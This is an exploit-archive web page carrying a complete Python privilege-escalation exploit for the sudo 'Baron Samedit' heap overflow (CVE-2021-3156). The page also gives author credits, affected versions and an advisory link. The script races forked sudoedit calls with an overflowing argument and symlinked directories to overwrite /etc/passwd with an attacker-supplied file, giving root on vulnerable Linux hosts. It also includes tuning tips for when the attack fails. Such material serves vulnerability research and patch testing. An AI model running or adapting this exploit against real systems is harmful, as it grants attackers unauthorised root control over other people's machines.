exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation

Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation
Posted Feb 3, 2021
Authored by West Shepherd, Baron Samedit, Stephen Tong

Sudo version 1.9.5p1 Baron Samedit heap-based buffer overflow and privilege escalation exploit.

tags | exploit, overflow
advisories | CVE-2021-3156
SHA-256 | 5c92904142e5934f1e20b05addc2261131559831f8576f64bf6cb2dca6f49edb

Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation

Change Mirror Download
# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
# Date: 2021-02-02
# Exploit Author: West Shepherd
# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.
# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31
# CVE : CVE-2021-3156
# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.
# Sources:
# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
# (2) https://github.com/stong/CVE-2021-3156
# Requirements: Python3

#!/usr/bin/python3
import os
import pwd
import time
import sys
import argparse


class Exploit(object):
username = ''
size = 0
data = ''

def __init__(self, source, target, sleep):
self.sleep = sleep
self.source = source
self.target = target

@staticmethod
def readFile(path):
return open(path, 'r').read()

@staticmethod
def getUser():
return pwd.getpwuid(os.getuid())[0]

@staticmethod
def getSize(path):
return os.stat(path).st_size

def main(self):
self.username = self.getUser()
self.data = self.readFile(self.source)
self.size = self.getSize(self.target)
environ = {
'\n\n\n\n\n': '\n' + self.data,
'SUDO_ASKPASS': '/bin/false',
'LANG':
'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
'A': 'A' * 0xffff
}
for i in range(5000):
directory =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i
overflow =
'11111111111111111111111111111111111111111111111111111111%s' %
directory

if os.path.exists(directory):
sys.stdout.write('file exists %s\n' % directory)
continue

child = os.fork()
os.environ = environ
if child:
sys.stdout.write('[+] parent %d \n' % i)
sys.stdout.flush()
time.sleep(self.sleep)
if not os.path.exists(directory):
try:
os.mkdir(directory, 0o700)
os.symlink(self.target, '%s/%s' % (directory,
self.username))
os.waitpid(child, 0)
except:
continue
else:
sys.stdout.write('[+] child %d \n' % i)
sys.stdout.flush()
os.setpriority(os.PRIO_PROCESS, 0, 20)
os.execve(
path='/usr/bin/sudoedit',
argv=[
'/usr/bin/sudoedit',
'-A',
'-s',
'\\',
overflow
],
env=environ
)
sys.stdout.write('[!] execve failed\n')
sys.stdout.flush()
os.abort()
break

if self.size != self.getSize(self.target):
sys.stdout.write('[*] success at iteration %d \n' % i)
sys.stdout.flush()
break
sys.stdout.write("""
\nConsider the following if the exploit fails:
\n\t(1) If all directories are owned by root then sleep
needs to be decreased.
\n\t(2) If they're all owned by you, then sleep needs
increased.
""")


if __name__ == '__main__':
parser = argparse.ArgumentParser(
add_help=True,
description='* Sudo Privilege Escalation / Heap Overflow -
CVE-2021-3156 *'
)
try:
parser.add_argument('-source', action='store', help='Path to
malicious "passwd" file to overwrite the target')
parser.add_argument('-target', action='store', help='Target
file path to be overwritten (default: /etc/passwd)')
parser.add_argument('-sleep', action='store', help='Sleep
setting for forked processes (default: 0.01 seconds')
parser.set_defaults(target='/etc/passwd', sleep='0.01')

options = parser.parse_args()
if options.source is None:
parser.print_help()
sys.exit(1)

exp = Exploit(
source=options.source,
target=options.target,
sleep=float(options.sleep)
)
exp.main()
except Exception as err:
sys.stderr.write(str(err))

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close